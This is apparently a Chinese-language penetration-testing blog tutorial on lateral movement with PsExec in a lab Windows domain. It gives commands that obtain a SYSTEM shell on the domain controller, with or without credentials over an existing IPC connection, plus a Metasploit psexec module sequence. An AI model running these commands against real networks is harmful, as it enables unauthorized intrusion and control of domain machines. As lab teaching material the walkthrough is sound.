利用PsExec进行横向渗透

  1. 利用条件
  2. 模拟利用过程
    1. 定位域控
    2. 无IPC连接
    3. 有IPC连接
    4. Msf中的Psexec模块

利用条件

  • 需要目标机器开启了ADMIN$共享(默认开启)
  • 建立了IPC连接,可以不输入账号密码连接到CMD窗口

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

优点:可直接获取SYSTEM权限的交互式shell
缺点:利用时会产生一个Psecex的服务,这个服务会产生日志文件,容易溯源

模拟利用过程

  • Win Server 2012 R2(DC)
  • Win 7(域中的一台机器)

定位域控

我们现在用Win7去攻击域控,在win7下cmd

首先看看ip

没发现域控在那台机器,win7的ip是192.168.43.102

查看域

查看域内其他主机

利用nslookup定位DC

这里我并未对DC做设置,所以默认的时候ADMIN$是共享状态,你也可以使用net share命令查看共享的资源

无IPC连接

我们在win7的机器上查看了解情况,若无共享的连接,则我们在使用PsExec的时候需要使用账号密码进行验证

1
PsExec.exe \\192.168.43.100 -u username -p password


无需弹出新的cmd窗口,直接拿下域控

有IPC连接

这个时候无需验证账号密码

1
PsExec.exe \\192.168.43.100 cmd.exe


成功啦~

Msf中的Psexec模块

1
2
3
4
5
use exploit/windows/smb/psexec
set RHOST 192.168.43.100
set smbuser usernmae
set smbpass password
run

这样就利用成功了

总的来说这个psexec利用的方式就是,只要服务器上面有连接的IPC,就可以搞出cmd。

差不多就这样吧


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:利用PsExec进行横向渗透

本文作者:sher10ck

发布时间:2020-02-04, 17:44:00

最后更新:2020-02-04, 19:30:38

原始链接:http://sherlocz.github.io/2020/02/04/利用PsExec进行横向渗透/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录